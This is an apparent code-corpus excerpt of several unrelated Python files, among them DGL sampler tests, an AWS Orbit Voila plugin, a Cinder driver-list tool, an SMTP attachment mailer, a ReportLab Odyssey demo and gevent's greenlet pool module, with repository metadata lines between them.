max_samples = 4 * num_edges
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=True,
reset=True,
edge_weight=edge_weight,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert len(pos_leid) == batch_size
total_samples += len(pos_leid)
if total_samples >= max_samples:
break
assert total_samples == max_samples
# check replacement = False with pos/neg edges no-uniform sample
# reset = False
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=False,
reset=False,
edge_weight=edge_weight,
node_weight=node_weight,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
relations=g.edata['etype'],
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert len(pos_leid) == batch_size
total_samples += len(pos_leid)
assert total_samples == num_edges
# check replacement = False with pos/neg edges no-uniform sample
# reset = True
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=False,
reset=True,
edge_weight=edge_weight,
node_weight=node_weight,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
relations=g.edata['etype'],
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert len(pos_leid) == batch_size
total_samples += len(pos_leid)
if total_samples >= max_samples:
break
assert total_samples == max_samples
# Check Rate
dgl.random.seed(0)
g = generate_rand_graph(1000)
num_edges = g.number_of_edges()
num_nodes = g.number_of_nodes()
edge_weight = F.copy_to(F.tensor(np.full((num_edges,), 1, dtype=np.float32)), F.cpu())
edge_weight[0] = F.sum(edge_weight, dim=0)
node_weight = F.copy_to(F.tensor(np.full((num_nodes,), 1, dtype=np.float32)), F.cpu())
node_weight[-1] = F.sum(node_weight, dim=0) / 200
etype = np.random.randint(0, 20, size=num_edges, dtype=np.int64)
g.edata['etype'] = F.copy_to(F.tensor(etype), F.cpu())
# Test w/o node weight.
max_samples = num_edges // 5
total_samples = 0
# Test the knowledge graph with edge weight provied.
edge_sampled = np.full((num_edges,), 0, dtype=np.int32)
node_sampled = np.full((num_nodes,), 0, dtype=np.int32)
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=True,
edge_weight=edge_weight,
shuffle=True,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=False,
relations=g.edata['etype'],
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
neg_lsrc, neg_ldst, _ = neg_edges.all_edges(form='all', order='eid')
if 'head' in mode:
neg_src = neg_edges.parent_nid[neg_lsrc]
np.add.at(node_sampled, F.asnumpy(neg_src), 1)
else:
neg_dst = neg_edges.parent_nid[neg_ldst]
np.add.at(node_sampled, F.asnumpy(neg_dst), 1)
np.add.at(edge_sampled, F.asnumpy(pos_edges.parent_eid[pos_leid]), 1)
total_samples += batch_size
if total_samples > max_samples:
break
# Check rate here
edge_rate_0 = edge_sampled[0] / edge_sampled.sum()
edge_tail_half_cnt = edge_sampled[edge_sampled.shape[0] // 2:-1].sum()
edge_rate_tail_half = edge_tail_half_cnt / edge_sampled.sum()
assert np.allclose(edge_rate_0, 0.5, atol=0.05)
assert np.allclose(edge_rate_tail_half, 0.25, atol=0.05)
node_rate_0 = node_sampled[0] / node_sampled.sum()
node_tail_half_cnt = node_sampled[node_sampled.shape[0] // 2:-1].sum()
node_rate_tail_half = node_tail_half_cnt / node_sampled.sum()
assert node_rate_0 < 0.02
assert np.allclose(node_rate_tail_half, 0.5, atol=0.02)
# Test the knowledge graph with edge/node weight provied.
edge_sampled = np.full((num_edges,), 0, dtype=np.int32)
node_sampled = np.full((num_nodes,), 0, dtype=np.int32)
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=True,
edge_weight=edge_weight,
node_weight=node_weight,
shuffle=True,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=False,
relations=g.edata['etype'],
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
neg_lsrc, neg_ldst, _ = neg_edges.all_edges(form='all', order='eid')
if 'head' in mode:
neg_src = F.gather_row(neg_edges.parent_nid, neg_lsrc)
np.add.at(node_sampled, F.asnumpy(neg_src), 1)
else:
neg_dst = F.gather_row(neg_edges.parent_nid, neg_ldst)
np.add.at(node_sampled, F.asnumpy(neg_dst), 1)
np.add.at(edge_sampled, F.asnumpy(pos_edges.parent_eid[pos_leid]), 1)
total_samples += batch_size
if total_samples > max_samples:
break
# Check rate here
edge_rate_0 = edge_sampled[0] / edge_sampled.sum()
edge_tail_half_cnt = edge_sampled[edge_sampled.shape[0] // 2:-1].sum()
edge_rate_tail_half = edge_tail_half_cnt / edge_sampled.sum()
assert np.allclose(edge_rate_0, 0.5, atol=0.05)
assert np.allclose(edge_rate_tail_half, 0.25, atol=0.05)
node_rate = node_sampled[-1] / node_sampled.sum()
node_rate_a = np.average(node_sampled[:50]) / node_sampled.sum()
node_rate_b = np.average(node_sampled[50:100]) / node_sampled.sum()
# As neg sampling does not contain duplicate nodes,
# this test takes some acceptable variation on the sample rate.
assert np.allclose(node_rate, node_rate_a * 5, atol=0.002)
assert np.allclose(node_rate_a, node_rate_b, atol=0.0002)
def check_positive_edge_sampler():
g = generate_rand_graph(1000)
num_edges = g.number_of_edges()
edge_weight = F.copy_to(F.tensor(np.full((num_edges,), 1, dtype=np.float32)), F.cpu())
edge_weight[num_edges-1] = num_edges ** 3
EdgeSampler = getattr(dgl.contrib.sampling, 'EdgeSampler')
# Correctness check
# Test the homogeneous graph.
batch_size = 128
edge_sampled = np.full((num_edges,), 0, dtype=np.int32)
for pos_edges in EdgeSampler(g, batch_size,
reset=False,
edge_weight=edge_weight):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
np.add.at(edge_sampled, F.asnumpy(pos_edges.parent_eid[pos_leid]), 1)
truth = np.full((num_edges,), 1, dtype=np.int32)
edge_sampled = edge_sampled[:num_edges]
assert np.array_equal(truth, edge_sampled)
edge_sampled = np.full((num_edges,), 0, dtype=np.int32)
for pos_edges in EdgeSampler(g, batch_size,
reset=False,
shuffle=True,
edge_weight=edge_weight):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
np.add.at(edge_sampled, F.asnumpy(pos_edges.parent_eid[pos_leid]), 1)
truth = np.full((num_edges,), 1, dtype=np.int32)
edge_sampled = edge_sampled[:num_edges]
assert np.array_equal(truth, edge_sampled)
@unittest.skipIf(dgl.backend.backend_name == "tensorflow", reason="TF doesn't support item assignment")
def test_negative_sampler():
check_negative_sampler('chunk-head', False, 10)
check_negative_sampler('head', True, 10)
check_negative_sampler('head', False, 10)
check_weighted_negative_sampler('chunk-head', False, 10)
check_weighted_negative_sampler('head', True, 10)
check_weighted_negative_sampler('head', False, 10)
check_positive_edge_sampler()
#disable this check for now. It might take too long time.
#check_negative_sampler('head', False, 100)
if __name__ == '__main__':
test_create_full()
test_1neighbor_sampler_all()
test_10neighbor_sampler_all()
test_1neighbor_sampler()
test_10neighbor_sampler()
test_layer_sampler()
test_nonuniform_neighbor_sampler()
test_setseed()
test_negative_sampler()
| 2.375 | 2 |
plugins/voila/voila/__init__.py | srinivasreddych/aws-orbit-workbench | 94 | 6969 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
from typing import TYPE_CHECKING, Any, Dict, Optional
import aws_orbit
from aws_orbit.plugins import hooks
from aws_orbit.remote_files import helm
if TYPE_CHECKING:
from aws_orbit.models.context import Context, TeamContext
_logger: logging.Logger = logging.getLogger("aws_orbit")
CHART_PATH = os.path.join(os.path.dirname(__file__))
@hooks.deploy
def deploy(
plugin_id: str,
context: "Context",
team_context: "TeamContext",
parameters: Dict[str, Any],
) -> None:
_logger.debug("Team Env name: %s | Team name: %s", context.name, team_context.name)
plugin_id = plugin_id.replace("_", "-")
_logger.debug("plugin_id: %s", plugin_id)
chart_path = helm.create_team_charts_copy(team_context=team_context, path=CHART_PATH, target_path=plugin_id)
vars: Dict[str, Optional[str]] = dict(
team=team_context.name,
region=context.region,
account_id=context.account_id,
env_name=context.name,
restart_policy=parameters["restartPolicy"] if "restartPolicy" in parameters else "Always",
path=parameters["path"] if "path" in parameters else "/home/jovyan/shared/voila",
options=parameters["options"] if "options" in parameters else "",
plugin_id=plugin_id,
toolkit_s3_bucket=context.toolkit.s3_bucket,
image_pull_policy="Always" if aws_orbit.__version__.endswith(".dev0") else "IfNotPresent",
image=parameters["image"] if "image" in parameters else team_context.final_image_address,
sts_ep="legacy" if context.networking.data.internet_accessible else "regional",
)
repo_location = team_context.team_helm_repository
if repo_location:
repo = team_context.name
helm.add_repo(repo=repo, repo_location=repo_location)
chart_name, chart_version, chart_package = helm.package_chart(repo=repo, chart_path=chart_path, values=vars)
helm.install_chart(
repo=repo,
namespace=team_context.name,
name=f"{team_context.name}-{plugin_id}",
chart_name=chart_name,
chart_version=chart_version,
)
@hooks.destroy
def destroy(
plugin_id: str,
context: "Context",
team_context: "TeamContext",
parameters: Dict[str, Any],
) -> None:
_logger.debug(
"Delete Plugin %s of Team Env name: %s | Team name: %s",
plugin_id,
context.name,
team_context.name,
)
helm.uninstall_chart(f"{team_context.name}-{plugin_id}", namespace=team_context.name)
| 1.664063 | 2 |
tools/generate_driver_list.py | aarunsai81/netapp | 11 | 6970 | #! /usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Generate list of cinder drivers"""
import argparse
import os
from cinder.interface import util
parser = argparse.ArgumentParser(prog="generate_driver_list")
parser.add_argument("--format", default='str', choices=['str', 'dict'],
help="Output format type")
# Keep backwards compatibilty with the gate-docs test
# The tests pass ['docs'] on the cmdln, but it's never been used.
parser.add_argument("output_list", default=None, nargs='?')
CI_WIKI_ROOT = "https://wiki.openstack.org/wiki/ThirdPartySystems/"
class Output(object):
def __init__(self, base_dir, output_list):
# At this point we don't care what was passed in, just a trigger
# to write this out to the doc tree for now
self.driver_file = None
if output_list:
self.driver_file = open(
'%s/doc/source/drivers.rst' % base_dir, 'w+')
self.driver_file.write('===================\n')
self.driver_file.write('Available Drivers\n')
self.driver_file.write('===================\n\n')
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
if self.driver_file:
self.driver_file.close()
def write(self, text):
if self.driver_file:
self.driver_file.write('%s\n' % text)
else:
print(text)
def format_description(desc, output):
desc = desc or '<None>'
lines = desc.rstrip('\n').split('\n')
for line in lines:
output.write(' %s' % line)
def print_drivers(drivers, config_name, output):
for driver in sorted(drivers, key=lambda x: x.class_fqn):
output.write(driver.class_name)
output.write('-' * len(driver.class_name))
if driver.version:
output.write('* Version: %s' % driver.version)
output.write('* %s=%s' % (config_name, driver.class_fqn))
if driver.ci_wiki_name:
output.write('* CI info: %s%s' % (CI_WIKI_ROOT,
driver.ci_wiki_name))
output.write('* Description:')
format_description(driver.desc, output)
output.write('')
output.write('')
def output_str(cinder_root, args):
with Output(cinder_root, args.output_list) as output:
output.write('Volume Drivers')
output.write('==============')
print_drivers(util.get_volume_drivers(), 'volume_driver', output)
output.write('Backup Drivers')
output.write('==============')
print_drivers(util.get_backup_drivers(), 'backup_driver', output)
output.write('FC Zone Manager Drivers')
output.write('=======================')
print_drivers(util.get_fczm_drivers(), 'zone_driver', output)
def collect_driver_info(driver):
"""Build the dictionary that describes this driver."""
info = {'name': driver.class_name,
'version': driver.version,
'fqn': driver.class_fqn,
'description': driver.desc,
'ci_wiki_name': driver.ci_wiki_name}
return info
def output_dict():
import pprint
driver_list = []
drivers = util.get_volume_drivers()
for driver in drivers:
driver_list.append(collect_driver_info(driver))
pprint.pprint(driver_list)
def main():
tools_dir = os.path.dirname(os.path.abspath(__file__))
cinder_root = os.path.dirname(tools_dir)
cur_dir = os.getcwd()
os.chdir(cinder_root)
args = parser.parse_args()
try:
if args.format == 'str':
output_str(cinder_root, args)
elif args.format == 'dict':
output_dict()
finally:
os.chdir(cur_dir)
if __name__ == '__main__':
main()
| 2.296875 | 2 |
Disp_pythonScript.py | maniegley/python | 1 | 6971 | <gh_stars>1-10
import sys
f = open("/home/vader/Desktop/test.py", "r")
#read all file
python_script = f.read()
print(python_script)
| 2.078125 | 2 |
email_file.py | grussr/email-file-attachment | 0 | 6972 | import smtplib
import argparse
from os.path import basename
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import COMMASPACE, formatdate
import configparser
import json
def send_mail(send_from, send_to, subject, text, files=None,
server="127.0.0.1", use_ssl=False, username=None, password=<PASSWORD>):
assert isinstance(send_to, list)
msg = MIMEMultipart()
msg['From'] = send_from
msg['To'] = COMMASPACE.join(send_to)
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = subject
msg.attach(MIMEText(text))
for f in files or []:
with open(f, "rb") as fil:
part = MIMEApplication(
fil.read(),
Name=basename(f)
)
# After the file is closed
part['Content-Disposition'] = 'attachment; filename="%s"' % basename(f)
msg.attach(part)
print server
if use_ssl == True:
smtp = smtplib.SMTP_SSL(server)
else:
smtp = smtplib.SMTP(server)
if username != None and username != '':
smtp.login(username, password)
smtp.sendmail(send_from, send_to, msg.as_string())
smtp.close()
parser = argparse.ArgumentParser()
parser.add_argument('attachment')
args = parser.parse_args()
attachpath = args.attachment
config = configparser.ConfigParser()
config.read('email_file.ini')
email_from = config['DEFAULT']['From']
email_to_list = json.loads(config['DEFAULT']['To'])
email_subject = config['DEFAULT']['Subject']
email_body = config['DEFAULT']['Body']
email_server = config['DEFAULT']['Server']
email_server_ssl = bool(config['DEFAULT']['Server_SSL'])
email_server_username = config['DEFAULT']['Server_Username']
email_server_password = config['DEFAULT']['Server_Password']
send_mail(email_from, email_to_list, email_subject, email_body, [attachpath], email_server, email_server_ssl, email_server_username, email_server_password)
| 2.890625 | 3 |
logs/constants.py | gonzatorte/sw-utils | 0 | 6973 | <gh_stars>0
import logging
TRACE_LVL = int( (logging.DEBUG + logging.INFO) / 2 )
| 1.328125 | 1 |
examples/simple_lakehouse/simple_lakehouse/repo.py | dbatten5/dagster | 2 | 6974 | <gh_stars>1-10
from dagster import repository
from simple_lakehouse.pipelines import simple_lakehouse_pipeline
@repository
def simple_lakehouse():
return [simple_lakehouse_pipeline]
| 1.375 | 1 |
demos/odyssey/dodyssey.py | steingabelgaard/reportlab | 55 | 6975 | <filename>demos/odyssey/dodyssey.py<gh_stars>10-100
#Copyright ReportLab Europe Ltd. 2000-2017
#see license.txt for license details
__version__='3.3.0'
__doc__=''
#REPORTLAB_TEST_SCRIPT
import sys, copy, os
from reportlab.platypus import *
_NEW_PARA=os.environ.get('NEW_PARA','0')[0] in ('y','Y','1')
_REDCAP=int(os.environ.get('REDCAP','0'))
_CALLBACK=os.environ.get('CALLBACK','0')[0] in ('y','Y','1')
if _NEW_PARA:
def Paragraph(s,style):
from rlextra.radxml.para import Paragraph as PPPP
return PPPP(s,style)
from reportlab.lib.units import inch
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.enums import TA_LEFT, TA_RIGHT, TA_CENTER, TA_JUSTIFY
import reportlab.rl_config
reportlab.rl_config.invariant = 1
styles = getSampleStyleSheet()
Title = "The Odyssey"
Author = "Homer"
def myTitlePage(canvas, doc):
canvas.saveState()
canvas.restoreState()
def myLaterPages(canvas, doc):
canvas.saveState()
canvas.setFont('Times-Roman',9)
canvas.drawString(inch, 0.75 * inch, "Page %d" % doc.page)
canvas.restoreState()
def go():
def myCanvasMaker(fn,**kw):
from reportlab.pdfgen.canvas import Canvas
canv = Canvas(fn,**kw)
# attach our callback to the canvas
canv.myOnDrawCB = myOnDrawCB
return canv
doc = BaseDocTemplate('dodyssey.pdf',showBoundary=0)
#normal frame as for SimpleFlowDocument
frameT = Frame(doc.leftMargin, doc.bottomMargin, doc.width, doc.height, id='normal')
#Two Columns
frame1 = Frame(doc.leftMargin, doc.bottomMargin, doc.width/2-6, doc.height, id='col1')
frame2 = Frame(doc.leftMargin+doc.width/2+6, doc.bottomMargin, doc.width/2-6,
doc.height, id='col2')
doc.addPageTemplates([PageTemplate(id='First',frames=frameT, onPage=myTitlePage),
PageTemplate(id='OneCol',frames=frameT, onPage=myLaterPages),
PageTemplate(id='TwoCol',frames=[frame1,frame2], onPage=myLaterPages),
])
doc.build(Elements,canvasmaker=myCanvasMaker)
Elements = []
ChapterStyle = copy.deepcopy(styles["Heading1"])
ChapterStyle.alignment = TA_CENTER
ChapterStyle.fontsize = 14
InitialStyle = copy.deepcopy(ChapterStyle)
InitialStyle.fontsize = 16
InitialStyle.leading = 20
PreStyle = styles["Code"]
def newPage():
Elements.append(PageBreak())
chNum = 0
def myOnDrawCB(canv,kind,label):
print('myOnDrawCB(%s)'%kind, 'Page number=', canv.getPageNumber(), 'label value=', label)
def chapter(txt, style=ChapterStyle):
global chNum
Elements.append(NextPageTemplate('OneCol'))
newPage()
chNum += 1
if _NEW_PARA or not _CALLBACK:
Elements.append(Paragraph(txt, style))
else:
Elements.append(Paragraph(('foo<onDraw name="myOnDrawCB" label="chap %d"/> '%chNum)+txt, style))
Elements.append(Spacer(0.2*inch, 0.3*inch))
if useTwoCol:
Elements.append(NextPageTemplate('TwoCol'))
def fTitle(txt,style=InitialStyle):
Elements.append(Paragraph(txt, style))
ParaStyle = copy.deepcopy(styles["Normal"])
ParaStyle.spaceBefore = 0.1*inch
if 'right' in sys.argv:
ParaStyle.alignment = TA_RIGHT
elif 'left' in sys.argv:
ParaStyle.alignment = TA_LEFT
elif 'justify' in sys.argv:
ParaStyle.alignment = TA_JUSTIFY
elif 'center' in sys.argv or 'centre' in sys.argv:
ParaStyle.alignment = TA_CENTER
else:
ParaStyle.alignment = TA_JUSTIFY
useTwoCol = 'notwocol' not in sys.argv
def spacer(inches):
Elements.append(Spacer(0.1*inch, inches*inch))
def p(txt, style=ParaStyle):
if _REDCAP:
fs, fe = '<font color="red" size="+2">', '</font>'
n = len(txt)
for i in range(n):
if 'a'<=txt[i]<='z' or 'A'<=txt[i]<='Z':
txt = (txt[:i]+(fs+txt[i]+fe))+txt[i+1:]
break
if _REDCAP>=2 and n>20:
j = i+len(fs)+len(fe)+1+int((n-1)/2)
while not ('a'<=txt[j]<='z' or 'A'<=txt[j]<='Z'): j += 1
txt = (txt[:j]+('<b><i><font size="+2" color="blue">'+txt[j]+'</font></i></b>'))+txt[j+1:]
if _REDCAP==3 and n>20:
n = len(txt)
fs = '<font color="green" size="+1">'
for i in range(n-1,-1,-1):
if 'a'<=txt[i]<='z' or 'A'<=txt[i]<='Z':
txt = txt[:i]+((fs+txt[i]+fe)+txt[i+1:])
break
Elements.append(Paragraph(txt, style))
firstPre = 1
def pre(txt, style=PreStyle):
global firstPre
if firstPre:
Elements.append(NextPageTemplate('OneCol'))
newPage()
firstPre = 0
spacer(0.1)
p = Preformatted(txt, style)
Elements.append(p)
def parseOdyssey(fn):
from time import time
E = []
t0=time()
text = open(fn,'r').read()
i0 = text.index('Book I')
endMarker = 'covenant of peace between the two contending parties.'
i1 = text.index(endMarker)+len(endMarker)
PREAMBLE=list(map(str.strip,text[0:i0].split('\n')))
L=list(map(str.strip,text[i0:i1].split('\n')))
POSTAMBLE=list(map(str.strip,text[i1:].split('\n')))
def ambleText(L):
while L and not L[0]: L.pop(0)
while L:
T=[]
while L and L[0]:
T.append(L.pop(0))
yield T
while L and not L[0]: L.pop(0)
def mainText(L):
while L:
B = L.pop(0)
while not L[0]: L.pop(0)
T=[]
while L and L[0]:
T.append(L.pop(0))
while not L[0]: L.pop(0)
P = []
while L and not (L[0].startswith('Book ') and len(L[0].split())==2):
E=[]
while L and L[0]:
E.append(L.pop(0))
P.append(E)
if L:
while not L[0]: L.pop(0)
yield B,T,P
t1 = time()
print("open(%s,'r').read() took %.4f seconds" %(fn,t1-t0))
E.append([spacer,2])
E.append([fTitle,'<font color="red">%s</font>' % Title, InitialStyle])
E.append([fTitle,'<font size="-4">by</font> <font color="green">%s</font>' % Author, InitialStyle])
for T in ambleText(PREAMBLE):
E.append([p,'\n'.join(T)])
for (B,T,P) in mainText(L):
E.append([chapter,B])
E.append([p,'<font size="+1" color="Blue"><b>%s</b></font>' % '\n'.join(T),ParaStyle])
for x in P:
E.append([p,' '.join(x)])
firstPre = 1
for T in ambleText(POSTAMBLE):
E.append([p,'\n'.join(T)])
t3 = time()
print("Parsing into memory took %.4f seconds" %(t3-t1))
del L
t4 = time()
print("Deleting list of lines took %.4f seconds" %(t4-t3))
for i in range(len(E)):
E[i][0](*E[i][1:])
t5 = time()
print("Moving into platypus took %.4f seconds" %(t5-t4))
del E
t6 = time()
print("Deleting list of actions took %.4f seconds" %(t6-t5))
go()
t7 = time()
print("saving to PDF took %.4f seconds" %(t7-t6))
print("Total run took %.4f seconds"%(t7-t0))
import hashlib
print('file digest: %s' % hashlib.md5(open('dodyssey.pdf','rb').read()).hexdigest())
def run():
for fn in ('odyssey.full.txt','odyssey.txt'):
if os.path.isfile(fn):
parseOdyssey(fn)
break
def doProf(profname,func,*args,**kwd):
import hotshot, hotshot.stats
prof = hotshot.Profile(profname)
prof.runcall(func)
prof.close()
stats = hotshot.stats.load(profname)
stats.strip_dirs()
stats.sort_stats('time', 'calls')
stats.print_stats(20)
if __name__=='__main__':
if '--prof' in sys.argv:
doProf('dodyssey.prof',run)
else:
run()
| 2.203125 | 2 |
tests/test_fred_fred_view.py | Traceabl3/GamestonkTerminal | 0 | 6976 | """ econ/fred_view.py tests """
import unittest
from unittest import mock
from io import StringIO
import pandas as pd
# pylint: disable=unused-import
from gamestonk_terminal.econ.fred_view import get_fred_data # noqa: F401
fred_data_mock = """
,GDP
2019-01-01,21115.309
2019-04-01,21329.877
2019-07-01,21540.325
2019-10-01,21747.394
2020-01-01,21561.139
2020-04-01,19520.114
2020-07-01,21170.252
2020-10-01,21494.731
"""
class TestFredFredView(unittest.TestCase):
@mock.patch("gamestonk_terminal.econ.fred_view.Fred.get_series")
def test_get_fred_data(self, mock_get_series):
fred_data = pd.read_csv(StringIO(fred_data_mock), header=0, index_col=0)
mock_get_series.return_value = fred_data
get_fred_data(["--noplot"], "gdp")
| 2.71875 | 3 |
python27/1.0/lib/linux/gevent/pool.py | jt6562/XX-Net | 2 | 6977 | # Copyright (c) 2009-2010 <NAME>. See LICENSE for details.
"""Managing greenlets in a group.
The :class:`Group` class in this module abstracts a group of running greenlets.
When a greenlet dies, it's automatically removed from the group.
The :class:`Pool` which a subclass of :class:`Group` provides a way to limit
concurrency: its :meth:`spawn <Pool.spawn>` method blocks if the number of
greenlets in the pool has already reached the limit, until there is a free slot.
"""
from gevent.hub import GreenletExit, getcurrent
from gevent.greenlet import joinall, Greenlet
from gevent.timeout import Timeout
from gevent.event import Event
from gevent.coros import Semaphore, DummySemaphore
__all__ = ['Group', 'Pool']
class Group(object):
"""Maintain a group of greenlets that are still running.
Links to each item and removes it upon notification.
"""
greenlet_class = Greenlet
def __init__(self, *args):
assert len(args) <= 1, args
self.greenlets = set(*args)
if args:
for greenlet in args[0]:
greenlet.rawlink(self.discard)
# each item we kill we place in dying, to avoid killing the same greenlet twice
self.dying = set()
self._empty_event = Event()
self._empty_event.set()
def __repr__(self):
try:
classname = self.__class__.__name__
except AttributeError:
classname = 'Group' # XXX check if 2.4 really uses this line
return '<%s at %s %s>' % (classname, hex(id(self)), self.greenlets)
def __len__(self):
return len(self.greenlets)
def __contains__(self, item):
return item in self.greenlets
def __iter__(self):
return iter(self.greenlets)
def add(self, greenlet):
greenlet.rawlink(self.discard)
self.greenlets.add(greenlet)
self._empty_event.clear()
def discard(self, greenlet):
self.greenlets.discard(greenlet)
self.dying.discard(greenlet)
if not self.greenlets:
self._empty_event.set()
def start(self, greenlet):
self.add(greenlet)
greenlet.start()
def spawn(self, *args, **kwargs):
add = self.add
greenlet = self.greenlet_class.spawn(*args, **kwargs)
add(greenlet)
return greenlet
def spawn_link(self, *args, **kwargs):
greenlet = self.spawn(*args, **kwargs)
greenlet.link()
return greenlet
def spawn_link_value(self, *args, **kwargs):
greenlet = self.spawn(*args, **kwargs)
greenlet.link_value()
return greenlet
def spawn_link_exception(self, *args, **kwargs):
greenlet = self.spawn(*args, **kwargs)
greenlet.link_exception()
return greenlet
# def close(self):
# """Prevents any more tasks from being submitted to the pool"""
# self.add = RaiseException("This %s has been closed" % self.__class__.__name__)
def join(self, timeout=None, raise_error=False):
if raise_error:
greenlets = self.greenlets.copy()
self._empty_event.wait(timeout=timeout)
for greenlet in greenlets:
if greenlet.exception is not None:
raise greenlet.exception
else:
self._empty_event.wait(timeout=timeout)
def kill(self, exception=GreenletExit, block=True, timeout=None):
timer = Timeout.start_new(timeout)
try:
try:
while self.greenlets:
for greenlet in list(self.greenlets):
if greenlet not in self.dying:
greenlet.kill(exception, block=False)
self.dying.add(greenlet)
if not block:
break
joinall(self.greenlets)
except Timeout, ex:
if ex is not timer:
raise
finally:
timer.cancel()
def killone(self, greenlet, exception=GreenletExit, block=True, timeout=None):
if greenlet not in self.dying and greenlet in self.greenlets:
greenlet.kill(exception, block=False)
self.dying.add(greenlet)
if block:
greenlet.join(timeout)
def apply(self, func, args=None, kwds=None):
"""Equivalent of the apply() builtin function. It blocks till the result is ready."""
if args is None:
args = ()
if kwds is None:
kwds = {}
if getcurrent() in self:
return func(*args, **kwds)
else:
return self.spawn(func, *args, **kwds).get()
def apply_cb(self, func, args=None, kwds=None, callback=None):
result = self.apply(func, args, kwds)
if callback is not None:
Greenlet.spawn(callback, result)
return result
def apply_async(self, func, args=None, kwds=None, callback=None):
"""A variant of the apply() method which returns a Greenlet object.
If callback is specified then it should be a callable which accepts a single argument. When the result becomes ready
callback is applied to it (unless the call failed)."""
if args is None:
args = ()
if kwds is None:
kwds = {}
if self.full():
# cannot call spawn() directly because it will block
return Greenlet.spawn(self.apply_cb, func, args, kwds, callback)
else:
greenlet = self.spawn(func, *args, **kwds)
if callback is not None:
greenlet.link(pass_value(callback))
return greenlet
def map(self, func, iterable):
greenlets = [self.spawn(func, item) for item in iterable]
return [greenlet.get() for greenlet in greenlets]
def map_cb(self, func, iterable, callback=None):
result = self.map(func, iterable)
if callback is not None:
callback(result)
return result
def map_async(self, func, iterable, callback=None):
"""
A variant of the map() method which returns a Greenlet object.
If callback is specified then it should be a callable which accepts a
single argument.
"""
return Greenlet.spawn(self.map_cb, func, iterable, callback)
def imap(self, func, iterable):
"""An equivalent of itertools.imap()
**TODO**: Fix this.
"""
return iter(self.map(func, iterable))
def imap_unordered(self, func, iterable):
"""The same as imap() except that the ordering of the results from the
returned iterator should be considered in arbitrary order."""
return IMapUnordered.spawn(self.spawn, func, iterable)
def full(self):
return False
def wait_available(self):
pass
class IMapUnordered(Greenlet):
def __init__(self, spawn, func, iterable):
from gevent.queue import Queue
Greenlet.__init__(self)
self.spawn = spawn
self.func = func
self.iterable = iterable
self.queue = Queue()
self.count = 0
def __iter__(self):
return self.queue
def _run(self):
try:
func = self.func
for item in self.iterable:
self.count += 1
self.spawn(func, item).rawlink(self._on_result)
finally:
self.__dict__.pop('spawn', None)
self.__dict__.pop('func', None)
self.__dict__.pop('iterable', None)
def _on_result(self, greenlet):
self.count -= 1
if greenlet.successful():
self.queue.put(greenlet.value)
if self.ready() and self.count <= 0:
self.queue.put(StopIteration)
def GreenletSet(*args, **kwargs):
import warnings
warnings.warn("gevent.pool.GreenletSet was renamed to gevent.pool.Group since version 0.13.0", DeprecationWarning, stacklevel=2)
return Group(*args, **kwargs)
class Pool(Group):
def __init__(self, size=None, greenlet_class=None):
if size is not None and size < 1:
raise ValueError('Invalid size for pool (positive integer or None required): %r' % (size, ))
Group.__init__(self)
self.size = size
if greenlet_class is not None:
self.greenlet_class = greenlet_class
if size is None:
self._semaphore = DummySemaphore()
else:
self._semaphore = Semaphore(size)
def wait_available(self):
self._semaphore.wait()
def full(self):
return self.free_count() <= 0
def free_count(self):
if self.size is None:
return 1
return max(0, self.size - len(self))
def start(self, greenlet):
self._semaphore.acquire()
try:
self.add(greenlet)
except:
self._semaphore.release()
raise
greenlet.start()
def spawn(self, *args, **kwargs):
self._semaphore.acquire()
try:
greenlet = self.greenlet_class.spawn(*args, **kwargs)
self.add(greenlet)
except:
self._semaphore.release()
raise
return greenlet
def spawn_link(self, *args, **kwargs):
self._semaphore.acquire()
try:
greenlet = self.greenlet_class.spawn_link(*args, **kwargs)
self.add(greenlet)
except:
self._semaphore.release()
raise
return greenlet
def spawn_link_value(self, *args, **kwargs):
self._semaphore.acquire()
try:
greenlet = self.greenlet_class.spawn_link_value(*args, **kwargs)
self.add(greenlet)
except:
self._semaphore.release()
raise
return greenlet
def spawn_link_exception(self, *args, **kwargs):
self._semaphore.acquire()
try:
greenlet = self.greenlet_class.spawn_link_exception(*args, **kwargs)
self.add(greenlet)
except:
self._semaphore.release()
raise
return greenlet
def discard(self, greenlet):
Group.discard(self, greenlet)
self._semaphore.release()
def get_values(greenlets):
joinall(greenlets)
return [x.value for x in greenlets]
class pass_value(object):
__slots__ = ['callback']
def __init__(self, callback):
